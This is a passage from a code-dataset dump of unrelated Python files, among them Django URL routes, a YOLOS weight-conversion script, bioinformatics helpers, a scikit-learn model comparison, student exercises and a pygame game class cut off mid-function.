name='api_julkinen_v1_data_model'),\n]\n","repo_name":"Opetushallitus/varda","sub_path":"webapps/webapps/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":19039,"program_lang":"python","lang":"fi","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"35821795256","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on 2023/9/29 14:42\n@user: jiananwang\n@title: SQL_to_noSQL\n\"\"\"\nfrom typing import List, Any\n\ncustomer_dict = {\n \"1000\": \"Ben Choi\",\n \"1001\": \"Jayden Choi\",\n \"1002\": \"Cammy Soh\",\n \"1004\": \"Mason Greenwood\",\n \"1005\": \"Dean Henderson\",\n}\n\nproduct_dict = {\n \"50001\": (\"Scott Pick A Size Multi Purpose Towels\", 4.25),\n \"50002\": (\"Japanese Super Crispy Chicken\", 11.80),\n \"50003\": (\"Vegan Beyond Burger Plant Based Patties Beef\", 14.90),\n \"50004\": (\"Korean Honey Sweet Potato\", 9.90),\n \"50005\": (\"Premium Atlantic Salmon 1Kg\", 22.00)\n}\n\norder_dict = {\n \"1880001\": (\"1000\", \"2020/01/21\"),\n \"1880002\": (\"1000\", \"2020/01/22\"),\n \"1880003\": (\"1000\", \"2020/01/23\"),\n \"1880004\": (\"1001\", \"2020/01/22\"),\n \"1880005\": (\"1001\", \"2020/01/23\"),\n \"1880006\": (\"1004\", \"2020/01/24\"),\n \"1880007\": (\"1005\", \"2020/01/25\"),\n}\n\norder_line_dict = {\n (\"1000\", \"1880001\", \"50001\"): 2,\n (\"1000\", \"1880001\", \"50003\"): 1,\n (\"1000\", \"1880002\", \"50002\"): 2,\n (\"1000\", \"1880003\", \"50004\"): 4,\n (\"1000\", \"1880003\", \"50005\"): 2,\n (\"1001\", \"1880004\", \"50003\"): 1,\n (\"1001\", \"1880004\", \"50004\"): 1,\n (\"1001\", \"1880005\", \"50002\"): 2,\n (\"1004\", \"1880006\", \"50004\"): 1,\n (\"1004\", \"1880006\", \"50005\"): 1,\n (\"1005\", \"1880007\", \"50002\"): 2,\n (\"1005\", \"1880007\", \"50003\"): 1,\n (\"1005\", \"1880007\", \"50001\"): 2\n}\n\n\ndef get_customer_order_id(customer_id: str, order_dict: dict) -> list[Any] | str:\n order_list = []\n for k, b in order_dict.items():\n if b[0] == customer_id:\n order_list.append(k)\n\n if order_list:\n return order_list\n return \"null\"\n\n\ndef get_productInfors(orderid: str) -> list:\n def make_string(productid: str, quantity: int, price: float) -> dict:\n product_infro_dict = {\"prodcutID\": str(productid),\n \"quantity\": quantity,\n \"price\": price}\n return product_infro_dict\n\n productInfors = []\n for k_order_line, v_order_line in order_line_dict.items():\n if orderid == k_order_line[1]:\n product_id = k_order_line[2]\n product_quantity = v_order_line\n product_price = product_dict[product_id][1]\n productInfors.append(make_string(product_id, product_quantity, product_price))\n\n return productInfors\n\n\nfor k, v in customer_dict.items():\n print(f\"\"\"{{\n \"_id\": \"{k}\",\n \"customerName\": \"{v}\",\n 
\"customerOrder\": {get_customer_order_id(k, order_dict)}\n }},\n \"\"\", end=\"\")\nprint()\nprint()\nprint(\"-------------\"*2)\n\nfor k, v in order_dict.items():\n print(f\"\"\"\n {{\n \"_id\": \"{k}\",\n \"orderDate\": \"{v[1]}\",\n \"customerID\": \"{v[0]}\",\n \"productInfors\":\n {get_productInfors(orderid=k)}\n }},\"\"\", end=\"\")\n\nprint()\nprint()\nprint(\"-------------\"*2)\n\nfor k, v in product_dict.items():\n print(f\"\"\"\n {{\n \"_id\": \"{k}\",\n \"productName\": \"{v[0]}\",\n \"standardPrice\": {v[1]}\n }},\"\"\", end=\"\")\n","repo_name":"Woniulol/fromAccToSomethingElse","sub_path":"dataBase/mongoDb/week9DataClean.py","file_name":"week9DataClean.py","file_ext":"py","file_size_in_byte":3068,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"27710630186","text":"\"\"\"\nGiven a config file, transform a pretrained ViTModel.\n\"\"\"\nimport os\nfrom config.yolos_tiny_config import yolos, args\n\nimport torch\ninit_method = 'tcp://'\nmaster_ip = os.getenv('MASTER_ADDR', '127.0.0.1')\nmaster_port = os.getenv('MASTER_PORT', '16666')\ninit_method += master_ip + ':' + master_port\ntorch.distributed.init_process_group(\n backend='nccl',\n world_size=args.world_size, rank=args.rank, init_method=init_method)\n\nimport sat.mpu as mpu\nmpu.initialize_model_parallel(args.model_parallel_size)\n\nfrom sat.model.official.yolos_model import YOLOS\nmodel = YOLOS(args, layernorm_epsilon=1e-6)\n\ndef copy_layer_param(src, dst):\n \"\"\"\n in-place copy from src to dst\n src and dst should be the same layer type, e.g., both are LayerNorm or both are Linear.\n Or at least, both have same named_parameters name and shape.\n \"\"\"\n src_dic = dict(src.named_parameters())\n dst_dic = dict(dst.named_parameters())\n for k in dst_dic:\n assert dst_dic[k].data.shape == src_dic[k].data.shape\n dst_dic[k].data = src_dic[k].data\n assert (dst_dic[k].data == src_dic[k].data).all()\n\ndef copy_from_param(src, dst):\n assert src.data.shape == dst.data.shape\n dst.data = src.data\n\ndef copy_layer_norm(src, dst):\n src_ln = []\n for k, v in src.named_parameters():\n if 'norm' in k.lower() and type(v) is not torch.nn.Identity():\n src_ln.append((k, v))\n dst_ln = []\n for k, v in dst.named_parameters():\n if 'layernorm' in k.lower():\n dst_ln.append((k, v))\n assert len(src_ln) == len(dst_ln)\n for kvs, kvd in zip(src_ln, dst_ln):\n assert kvd[1].data.shape == kvs[1].data.shape\n kvd[1].data = kvs[1].data\n assert (kvd[1].data == kvs[1].data).all()\n\ndef copy_transformer_layer_wo_ln(src, dst):\n new_weight = src.attn.qkv.weight.data\n assert dst.attention.query_key_value.weight.data.shape == new_weight.shape\n dst.attention.query_key_value.weight.data = new_weight\n new_bias = src.attn.qkv.bias.data\n assert dst.attention.query_key_value.bias.data.shape == new_bias.shape\n dst.attention.query_key_value.bias.data = new_bias\n copy_layer_param(src.attn.proj, dst.attention.dense)\n copy_layer_param(src.mlp.fc1, dst.mlp.dense_h_to_4h)\n copy_layer_param(src.mlp.fc2, dst.mlp.dense_4h_to_h)\n\ndef transform_weight(src_model, swiss_model):\n words = torch.cat((src_model.backbone.cls_token.data[0], src_model.backbone.det_token.data[0]))\n copy_from_param(words, swiss_model.transformer.word_embeddings.weight)\n copy_from_param(src_model.backbone.pos_embed.data[0], swiss_model.transformer.position_embeddings.weight)\n copy_layer_norm(src_model.backbone, swiss_model)\n for src_l, dst_l in zip(src_model.backbone.blocks, swiss_model.transformer.layers):\n 
copy_transformer_layer_wo_ln(src_l, dst_l)\n copy_layer_param(src_model.backbone.patch_embed.proj, swiss_model.mixins.patch_embedding.proj)\n copy_layer_param(src_model.class_embed, swiss_model.mixins.det_head.class_embed)\n copy_layer_param(src_model.bbox_embed, swiss_model.mixins.det_head.bbox_embed)\n \n\nyolos.eval()\nmodel.eval()\nwith torch.no_grad():\n transform_weight(yolos, model)\n images = torch.randn(2, 3, 800, 1333)*10\n src_output = yolos(images)\n\n batch_size, _, height, width = images.shape\n num_patches = (height//16) * (width//16)\n seq_len = 1 + num_patches + model.get_mixin('det_head').num_det_tokens\n position_ids = torch.cat([torch.arange(seq_len)[None,]]*batch_size)\n encoded_input = {'input_ids':torch.cat([torch.arange(1+model.get_mixin('det_head').num_det_tokens)[None,]]*batch_size).long(), 'image':images, 'position_ids':position_ids}\n encoded_input['attention_mask'] = None\n\n dst_output = model(**encoded_input, offline=True) # offline=False, height=height//16, width=width//16)[0]\n\n torch.save({'module':model.state_dict()}, \"output.pt\")\n\nbreakpoint()\n","repo_name":"THUDM/SwissArmyTransformer","sub_path":"examples/yolos/transform_param.py","file_name":"transform_param.py","file_ext":"py","file_size_in_byte":3929,"program_lang":"python","lang":"en","doc_type":"code","stars":743,"dataset":"github-code","pt":"52"} +{"seq_id":"19026608004","text":"#############\n## Package ##\n#############\nimport os\nimport sys\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nfrom pyqtgraph.examples.colorMaps import cm\n\n\n\ndef cell_over_time_one_patient(data_source_folder,\n data_destination_folder,\n figure_name,\n column=2,\n saved=True):\n \"\"\"\n :param data_source_folder: path to folder that contain Thsd_1500_p5X.dat file\n :param data_destination_folder:\n :param figure_name:\n :param column:\n :param saved:\n :return:\n \"\"\"\n\n # Basic information\n source = os.path.join(data_source_folder, 'Thsd_1500_p5X.dat')\n destination = data_destination_folder\n\n # Figure\n plt.style.use('ipynb')\n fig = plt.figure(figsize=(10,5))\n\n # Data\n df = pd.read_csv(source, header=None)\n # time column\n time_ = df.iloc[:, 0]\n # cell column\n cell = df.iloc[:, column]\n\n # Plotting\n plt.scatter(time_, cell, linewidth=2, marker='.', s=8)\n\n # Labels\n plt.xlabel(\"Temps (min)\", fontsize=16)\n plt.ylabel(\"Nombre de cellules cancéreuses\",fontsize=16)\n\n # Ticks\n plt.ticklabel_format(useOffset=False, style='plain', axis='y')\n plt.ticklabel_format(useOffset=False, style='plain', axis='x')\n\n plt.xticks(fontsize=14)\n plt.yticks(fontsize=14)\n\n if saved:\n figure_path = os.path.join(destination, f\"{figure_name}.png\")\n plt.savefig(figure_path)\n plt.close()\n return figure_path\n\n else:\n plt.show()\n\nif __name__ == \"__main__\":\n print(*sys.argv, sep='\\n')\n cell_over_time_one_patient(*sys.argv[1::])\n","repo_name":"Jhebertaz/PhysiCellGui","sub_path":"addons/SimulationWithPhysiCell/script/cell_over_time_one_patient.py","file_name":"cell_over_time_one_patient.py","file_ext":"py","file_size_in_byte":1684,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"24423154109","text":"class Solution:\n def dominantIndex(self, nums: List[int]) -> int:\n if len(nums)==1:\n return 0\n else:\n largest=max(nums)\n larg_index=nums.index(largest)\n nums=[val for val in nums if val!=largest]\n for i in nums:\n if largest>=2*i:\n continue\n else:\n return -1\n return larg_index\n 
","repo_name":"abhiraj24/Leetcode","sub_path":"largest-number-at-least-twice-of-others/largest-number-at-least-twice-of-others.py","file_name":"largest-number-at-least-twice-of-others.py","file_ext":"py","file_size_in_byte":436,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"42573536369","text":"#!/usr/bin/env python\n\nfrom Bio import SeqIO\nimport sys\n\nsyntax = '''\n------------------------------------------------------------------------------------\nSyntax: python extract_sequence_by_name_list.py *file1.fasta *file2.txt\n*Sequences in fasta format \n**List of sequences to extract; must have the same name as in fasta file without '>'\n------------------------------------------------------------------------------------\n'''\nif len(sys.argv) != 3:\n print(syntax)\n sys.exit()\n\nfrom Bio import SeqIO \nimport sys \n\nwanted = [line.strip() for line in open(sys.argv[2])] \nseqiter = SeqIO.parse(open(sys.argv[1]), 'fasta') \nSeqIO.write((seq for seq in seqiter if seq.id in wanted), sys.stdout, \"fasta\")\n","repo_name":"kieft1bp/ASVs_to_Genomes","sub_path":"get_fasta_seqs.py","file_name":"get_fasta_seqs.py","file_ext":"py","file_size_in_byte":922,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"72455878566","text":"#!/usr/bin/env python3\n\"\"\"Remove indels which are falsely aligned as runs of single base mismatches in\nother samples.\"\"\"\n# This script is awful\nimport sys\n\nimport click\n\nfrom pandas import read_csv\nfrom plumbum.cmd import rg\n\n\nBASE_IDX = {\n \"A\": [4, 8],\n \"T\": [5, 9],\n \"C\": [6, 10],\n \"G\": [7, 11]\n}\n\n\ndef is_insertion(indel):\n return len(indel[\"REF\"]) < len(indel[\"ALT\"])\n\n\ndef get_ref_base(chrom, pos, pileup):\n exit_code, stdout, stderr = rg.run(\n [\"\\s\".join([chrom, str(pos)]), pileup],\n retcode=None\n )\n if exit_code != 0:\n return 0\n return stdout.split()[2]\n\n\ndef check_indel(indel, pileups):\n if is_insertion(indel):\n bad_bases = indel[\"ALT\"][1:]\n indel_length = len(indel[\"ALT\"])\n else:\n indel_length = len(indel[\"REF\"])\n bad_base_start = indel[\"POS\"] + indel_length\n bad_base_pos = range(bad_base_start, bad_base_start + indel_length)\n bad_bases = [\n get_ref_base(indel[\"CHROM\"], pos, pileups[0])\n for pos in bad_base_pos\n ]\n if any([base == 0 for base in bad_bases]):\n return True\n adj_base = int(indel[\"POS\"] + 1)\n adj_base_pos = range(adj_base, adj_base + indel_length - 1)\n for bad, adj in zip(bad_bases, adj_base_pos):\n if get_ref_base(indel[\"CHROM\"], adj, pileups[0]) != bad:\n for pileup in pileups:\n counts = rg.run(\n [\"\\s\".join([indel[\"CHROM\"], str(adj)]),\n pileup], retcode=None\n )[1].split()\n if counts:\n target_base_counts = (\n int(counts[BASE_IDX[bad][0]]) +\n int(counts[BASE_IDX[bad][1]])\n )\n if target_base_counts > 0:\n return False\n return True\n\n\ndef filter_indels(pileups, indels):\n if len(indels):\n passing = indels.apply(check_indel, axis=1, pileups=pileups)\n filtered_indels = indels[passing]\n else:\n filtered_indels = indels\n filtered_indels.to_csv(sys.stdout, sep=\"\\t\", index=False)\n\n\n@click.command()\n@click.option(\"--indels\", help=\"TSV file containing indels.\")\n@click.argument(\"pileups\", nargs=-1)\ndef cli(pileups, indels):\n filter_indels(pileups, read_csv(indels, sep=\"\\t\"))\n\n\nif __name__ == \"__main__\":\n 
cli()\n","repo_name":"fennerm/megadaph","sub_path":"pipe/scripts/filter_misaligned_shared_indels.py","file_name":"filter_misaligned_shared_indels.py","file_ext":"py","file_size_in_byte":2362,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"73810356004","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom pandas import set_option\nfrom pandas.plotting import scatter_matrix\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.model_selection import KFold\nfrom sklearn.model_selection import cross_val_score\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.linear_model import Lasso\nfrom sklearn.linear_model import ElasticNet\nfrom sklearn.tree import DecisionTreeRegressor\nfrom sklearn.neighbors import KNeighborsRegressor\nfrom sklearn.svm import SVR\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.ensemble import RandomForestRegressor, RandomForestClassifier\nfrom sklearn.ensemble import GradientBoostingRegressor\nfrom sklearn.ensemble import ExtraTreesRegressor\nfrom sklearn.ensemble import AdaBoostRegressor, AdaBoostClassifier\nfrom sklearn.metrics import mean_squared_error\nfrom xgboost import XGBRegressor, XGBClassifier\nfrom lightgbm import LGBMRegressor, LGBMClassifier\nfrom catboost import CatBoostRegressor, CatBoostClassifier\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.discriminant_analysis import LinearDiscriminantAnalysis\nfrom sklearn.naive_bayes import GaussianNB\nfrom sklearn.svm import SVC\nfrom sklearn import preprocessing\nimport seaborn as sns\n\nimport numpy as np\nfrom sklearn import datasets\nfrom sklearn.datasets import fetch_covtype\nfrom tensorflow.keras.utils import to_categorical\nfrom tensorflow.python.keras.metrics import accuracy\nfrom tensorflow.python.keras.utils.metrics_utils import result_wrapper\n\n#1. 
Data\ndatasets= fetch_covtype()\n# the id column is not needed, so drop it\nx = datasets.data\ny = datasets.target\n\n\n# import pandas as pd\n# y = pd.get_dummies(y)\n# print(y)\n\nX_train, X_valid, y_train, y_valid = train_test_split(x,y\n                                                    ,test_size=0.3,random_state=66)\n\n\n# # Base\n\n# num_folds= 10\n# seed = 7\n# scoring = 'neg_root_mean_squared_error'\n# X_all = x[y.columns.tolist()]\n# y_all =x['Body Mass (g)']\n\n# X_train, X_valid, y_train, y_valid = train_test_split(x[y.columns.tolist()],x['Body Mass (g)']\n#                                                     ,test_size=0.3,random_state=66)\n\n# the grid searches further down use these names; for the covtype data take the full arrays and 10 folds\nnum_folds = 10\nX_all = x\ny_all = y\n\n\nmodels = []\nmodels.append(('LR',LinearRegression()))\nmodels.append(('LASSO',Lasso()))\nmodels.append(('KNN',KNeighborsRegressor()))\nmodels.append(('CART',DecisionTreeRegressor()))\nmodels.append(('EN',ElasticNet()))\nmodels.append(('SVM',SVR()))\nmodels.append(('RFR',RandomForestRegressor()))\nmodels.append(('XGBR',XGBRegressor()))\nmodels.append(('LGBMR',LGBMRegressor()))\nmodels.append(('AdaR',AdaBoostRegressor()))\nmodels.append(('Cat',CatBoostRegressor(verbose=False)))\nmodels.append(('Xtree',ExtraTreesRegressor()))\n\nscoring = 'neg_root_mean_squared_error'\nresults =[]\nnames = []\nfor name, model in models:\n    kfold = KFold(n_splits=10,random_state=66,shuffle = True)\n    cv_results = cross_val_score(model,X_train,y_train\n                                 ,cv= kfold,scoring='neg_root_mean_squared_error')\n    results.append(cv_results)\n    names.append(name)\n    msg = \"%s : %f (%f) \"%(name,cv_results.mean(),cv_results.std())\n    print(msg)\n\n\n\n\n#standardization\n\npipelines = []\npipelines.append(('ScaledLR',Pipeline([('Scaler',preprocessing.StandardScaler()),('LR',LinearRegression())])))\npipelines.append(('ScaledLASSO',Pipeline([('Scaler',preprocessing.StandardScaler()),('LASSO',Lasso())])))\npipelines.append(('ScaledKNN',Pipeline([('Scaler',preprocessing.StandardScaler()),('KNN',KNeighborsRegressor())])))\npipelines.append(('ScaledCART',Pipeline([('Scaler',preprocessing.StandardScaler()),('CART',DecisionTreeRegressor())])))\npipelines.append(('ScaledEN',Pipeline([('Scaler',preprocessing.StandardScaler()),('EN',ElasticNet())])))\npipelines.append(('ScaledSVM',Pipeline([('Scaler',preprocessing.StandardScaler()),('SVM',SVR())])))\npipelines.append(('ScaledRFR',Pipeline([('Scaler',preprocessing.StandardScaler()),('RFR',RandomForestRegressor())])))\npipelines.append(('ScaledXGBR',Pipeline([('Scaler',preprocessing.StandardScaler()),('XGBR',XGBRegressor())])))\npipelines.append(('ScaledLGBMR',Pipeline([('Scaler',preprocessing.StandardScaler()),('LGBMR',LGBMRegressor())])))\npipelines.append(('ScaledAdaR',Pipeline([('Scaler',preprocessing.StandardScaler()),('AdaR',AdaBoostRegressor())])))\npipelines.append(('ScaledCat',Pipeline([('Scaler',preprocessing.StandardScaler()),('Cat',CatBoostRegressor(verbose=False))])))\npipelines.append(('ScaledXtree',Pipeline([('Scaler',preprocessing.StandardScaler()),('Xtree',ExtraTreesRegressor())])))\n\nresults_scaled =[]\nnames_scaled = []\nfor name, model in pipelines:\n    kfold = KFold(n_splits=10,random_state=66,shuffle = True)\n    cv_results = cross_val_score(model,X_train,y_train\n                                 ,cv= kfold,scoring=scoring)\n    results_scaled.append(cv_results)\n    names_scaled.append(name)\n    msg = \"%s : %f (%f) \"%(name,cv_results.mean(),cv_results.std())\n    print(msg)\n\n\nscaler = preprocessing.StandardScaler().fit(X_all)\nscaled_X = scaler.transform(X_all)\nparams = { 'n_estimators' : [10, 50,100],\n           'max_depth' : [6, 12,18,24],\n           'min_samples_leaf' : [1, 6, 12, 18],\n           'min_samples_split' : [2, 8, 16, 20]\n
}\nmodel = RandomForestRegressor()\nkfold = KFold(n_splits= num_folds,random_state = 66 ,shuffle = True)\ngrid = GridSearchCV(estimator= model, param_grid = params,scoring= 'neg_root_mean_squared_error',cv=kfold )\ngrid_result = grid.fit(scaled_X,y_all)\n\nprint(\"Best : %f using %s \"%(grid_result.best_score_,grid_result.best_params_)) \n \n \n \n \nparams = { 'n_estimators' : [10, 50,100],\n 'max_depth' : [6,12,18,24],\n 'min_samples_leaf' : [1, 6, 12, 18],\n 'min_samples_split' : [2,4,8, 16]\n }\nmodel =ExtraTreesRegressor()\nkfold = KFold(n_splits= num_folds,random_state = 66 ,shuffle = True)\ngrid = GridSearchCV(estimator= model, param_grid = params, scoring= 'neg_root_mean_squared_error',cv=kfold )\ngrid_result = grid.fit(X_all,y_all) \n \n \n\nprint(\"Best : %f using %s \"%(grid_result.best_score_,grid_result.best_params_))\n\n \n \nfrom sklearn.metrics import mean_squared_error\nimport math \n \n \nerrors = []\npred_valid=[]\npred_test = [] \n \n \nscaler = preprocessing.StandardScaler().fit(X_train)\nscaled_X_train = scaler.transform(X_train)\nscaled_X_valid = scaler.transform(X_valid)\nscaled_X_test = scaler.transform(test) \n \n \n \nlasso = Lasso()\nlasso.fit(X_train,y_train)\nlasso_valid = lasso.predict(X_valid)\nrmse = math.sqrt(mean_squared_error(y_valid, lasso_valid))\nerrors.append(('Lasso',rmse))\npred_valid.append(('Lasso',lasso_valid))\nlasso_test = lasso.predict(test)\npred_test.append(('Lasso',lasso_test)) \n \n \nLR =LinearRegression()\nLR.fit(scaled_X_train,y_train)\nlr_valid = LR.predict(scaled_X_valid)\nrmse = math.sqrt(mean_squared_error(y_valid, lr_valid))\nerrors.append(('LR',rmse))\npred_valid.append(('LR',lr_valid))\nlr_test = LR.predict(scaled_X_test)\npred_test.append(('LR',lr_test)) \n \n \nRF =RandomForestRegressor(max_depth= 24, min_samples_leaf= 12, min_samples_split= 16, n_estimators= 40)\nRF.fit(scaled_X_train,y_train)\nrf_valid = RF.predict(scaled_X_valid)\nrmse = math.sqrt(mean_squared_error(y_valid, rf_valid))\nerrors.append(('RF',rmse))\npred_valid.append(('RF',rf_valid))\nrf_test = RF.predict(scaled_X_test)\npred_test.append(('RF',rf_test)) \n \nET =ExtraTreesRegressor(max_depth=24, min_samples_leaf= 12, min_samples_split= 16, n_estimators= 40)\nET.fit(X_train,y_train)\net_valid = ET.predict(X_valid)\nrmse = math.sqrt(mean_squared_error(y_valid, et_valid))\nerrors.append(('ET',rmse))\npred_valid.append(('ET',et_valid))\net_test = ET.predict(test)\npred_test.append(('ET',et_test)) \n \nCAT = CatBoostRegressor(iterations=10000,random_state=66\n ,eval_metric=\"RMSE\")\nCAT.fit(X_train,y_train, eval_set=[(X_valid,y_valid)],early_stopping_rounds=30\n ,verbose=1000 )\ncat_valid = CAT.predict(X_valid)\nrmse = math.sqrt(mean_squared_error(y_valid, cat_valid))\nerrors.append(('CAT',rmse))\npred_valid.append(('CAT',cat_valid))\ncat_test = CAT.predict(test)\npred_test.append(('CAT',cat_test))\n\n\n \n \nfor name, error in errors:\n print(\"{} : {}\".format(name,error)) \n \n \nval= np.zeros(X_valid.shape[0])\nfor name, pred in pred_valid:\n val+= (0.2* pred)\nmath.sqrt(mean_squared_error(y_valid, val)) \n \n \n \n \nval= np.zeros(X_valid.shape[0])\nfor name, pred in pred_valid:\n if name == 'Lasso' or name=='LR' or name == 'ET' or name=='CAT':\n val+= (0.25* pred)\nmath.sqrt(mean_squared_error(y_valid, val)) \n \n \n \ntest_val= np.zeros(test.shape[0])\nfor name, pred in pred_test:\n if name == 'Lasso' or name=='LR' or name == 'ET' or name=='CAT':\n test_val+= (0.25* pred)\n\n#model.save_weights(\"./_save/keras999_1_save_weights.h5\")\n#model = 
load_model('./_ModelCheckPoint/ss_ki_1222_Trafevol5.hdf5')\n    \n# submission = pd.read_csv(path+'sample_submission.csv')\n# submission['Body Mass (g)'] = test_val\n# submission.to_csv(path+\"penguin_0107_03.csv\", index=False)\n'''\n\n\n\n'''","repo_name":"jangsejong/STUDY","sub_path":"machine_running/ml03/ml03_4_fetch_covtype.py","file_name":"ml03_4_fetch_covtype.py","file_ext":"py","file_size_in_byte":9160,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"30211071086","text":"#Print the even values among those defined in the list.\r\n\r\nliste = [1, 2, 3, 4, 5, 6, 7, 8, 9]\r\n\r\nfor i in liste:\r\n    if i % 2 == 0:\r\n        print(i)\r\n\r\n\r\n#sayi%5==1\r\n#this means the remainder of dividing the number by 5 is 1","repo_name":"xdejavu/BilsemDersPython","sub_path":"Ders8/uygulama.py","file_name":"uygulama.py","file_ext":"py","file_size_in_byte":242,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"39081182175","text":"import logging\nfrom typing import cast\n\nfrom django.apps import apps\nfrom django.conf import settings\nfrom django.core.management.base import BaseCommand\n\nfrom django_stator.models import StatorModel\nfrom django_stator.runner import StatorRunner\n\nlogger = logging.getLogger(__name__)\n\n\nclass Command(BaseCommand):\n    help = \"Runs a Stator runner\"\n\n    def add_arguments(self, parser):\n        parser.add_argument(\n            \"--concurrency\",\n            \"-c\",\n            type=int,\n            default=None,\n            help=\"How many threads to provision\",\n        )\n        parser.add_argument(\n            \"--liveness-file\",\n            type=str,\n            default=None,\n            help=\"A file to touch at least every 30 seconds to say the runner is alive\",\n        )\n        parser.add_argument(\n            \"--run-for\",\n            \"-r\",\n            type=int,\n            default=0,\n            help=\"How long to run for before exiting (defaults to infinite)\",\n        )\n        parser.add_argument(\n            \"--exclude\",\n            \"-x\",\n            type=str,\n            action=\"append\",\n            help=\"Model labels that should not be processed\",\n        )\n        parser.add_argument(\"model_labels\", nargs=\"*\", type=str)\n\n    def handle(\n        self,\n        model_labels: list[str],\n        exclude: list[str],\n        run_for: int,\n        liveness_file: str | None = None,\n        concurrency: int = getattr(settings, \"STATOR_CONCURRENCY\", 10),\n        *args,\n        **options,\n    ):\n        # Cache system config\n        logging.basicConfig(\n            format=\"[%(asctime)s] %(levelname)8s - %(message)s\",\n            datefmt=\"%Y-%m-%d %H:%M:%S\",\n            level=logging.INFO,\n            force=True,\n        )\n        # Resolve the models list into names\n        models = cast(\n            list[type[StatorModel]],\n            [apps.get_model(label) for label in model_labels],\n        )\n        excluded = cast(\n            list[type[StatorModel]],\n            [apps.get_model(label) for label in (exclude or [])],\n        )\n        if not models:\n            models = StatorModel.subclasses\n        models = [model for model in models if model not in excluded]\n        logger.info(\n            \"Running for models: \" + \" \".join(m._meta.label_lower for m in models)\n        )\n        # Run a runner\n        runner = StatorRunner(\n            models,\n            concurrency=concurrency,\n            liveness_file=liveness_file,\n        )\n        try:\n            runner.run(run_for=run_for)\n        except KeyboardInterrupt:\n            logger.critical(\"Ctrl-C received\")\n","repo_name":"andrewgodwin/django-stator","sub_path":"django_stator/management/commands/runstator.py","file_name":"runstator.py","file_ext":"py","file_size_in_byte":2605,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"52"}
{"seq_id":"14259664301","text":"array = {}\ni = 0\na = input(\"Enter the number of students: \")\nwhile i < int(a) :\n
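    # collect each student's name and mark into the dictionary, keyed by name\n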
    i=i+1\n    print(f\"enter the name of student {i}:\",end=\" \")\n    student = input()\n    print(f\"enter the mark of student {i}:\",end=\" \")\n    mark = input()\n    array[student] = mark\nprint(array)\n\nprint(\"enter the name of a student to retrieve their mark\")\nname = input(\"enter the name \")\nprint(array[name])\n","repo_name":"aparna2345/python--samples","sub_path":"sample20.py","file_name":"sample20.py","file_ext":"py","file_size_in_byte":380,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"11212408174","text":"import matplotlib.pyplot as plt\nfrom math import cos, sin, radians\n\nlength = 10\n\n#plt.arrow(0.2, 0, 0.5, 0.5)\n#plt.arrow(2, 0, 0.5, 0.5, head_width=0.05, head_length=0.1, fc='k', ec='k')\n\nlista = []\n\"\"\"\nwith open(\"students001.vsp\") as f:\n    for line in f:\n        word = line.split()\n        if(len(word) == 8):\n            lista.append([float(word[0]),float(word[1]),radians(float(word[3]))])\nwith open(\"students003.vsp\") as f:\n    for line in f:\n        word = line.split()\n        if(len(word) == 8):\n            lista.append([float(word[0]),float(word[1]),radians(float(word[3]))])\n\"\"\"\n\ndef reader(file, out_list):\n    file.readline()\n    line = file.readline()\n    while line:\n        points = int(line.split()[0])\n        line=file.readline()\n        for x in range(1, points):\n            line=file.readline()\n            word = line.split()\n            out_list.append([float(word[0]),float(word[1]),radians(float(word[3]))])\n        line = file.readline()\n\n\nwith open(\"students001.vsp\") as f:\n    reader(f, lista)\n\n\nprev = []\nfor point in lista:\n    plt.arrow(point[0],point[1],length*sin(point[2]),length*cos(point[2]), head_width=5)\n\nxmax = 400\nymax = 400\nplt.axis([-xmax,xmax,-ymax,ymax])\nplt.show()\n","repo_name":"plundahl/CrowdAnomalyDetection","sub_path":"showAll.py","file_name":"showAll.py","file_ext":"py","file_size_in_byte":1223,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"}
{"seq_id":"23867201047","text":"import pygame\r\nfrom app.Organisms.Animal import Animal\r\nfrom app.Coordinates import Coordinates\r\nimport sys\r\n\r\n\r\nclass Human (Animal):\r\n\r\n    def __init__(self, world, location):\r\n        super().__init__(world, 5, 4, \"#\", \"app\\\\utilities\\\\human.bmp\", location)\r\n\r\n    def reproduce(self, org):\r\n        pass\r\n\r\n    def action(self):\r\n        self.immortality()\r\n        self.makeMove(1)\r\n\r\n    def immortality(self):\r\n        if self._world.getSuperPower():\r\n            self._world.setRounds(self._world.getRounds() + 1)\r\n            if self._world.getRounds() == 5:\r\n                self._world.setSuperPower(False)\r\n                self._world.setToNext(0)\r\n        else:\r\n            self._world.setToNext(self._world.getToNext() + 1)\r\n            if self._world.getToNext() >= 5:\r\n                case = True\r\n                super = False\r\n                while case:\r\n                    for event in pygame.event.get():\r\n                        if event.type == pygame.KEYDOWN:\r\n                            if event.key == pygame.K_y:\r\n                                super = True\r\n                                case = False\r\n                            elif event.key == pygame.K_n:\r\n                                case = False\r\n                        if event.type == pygame.QUIT:\r\n                            pygame.quit()\r\n                            sys.exit()\r\n                if super:\r\n                    self._world.setSuperPower(True)\r\n                    self._world.setRounds(1)\r\n\r\n    def makeMove(self, counter):\r\n        counter += 1\r\n        temp = Coordinates(0, 0)\r\n        case = True\r\n        while case:\r\n
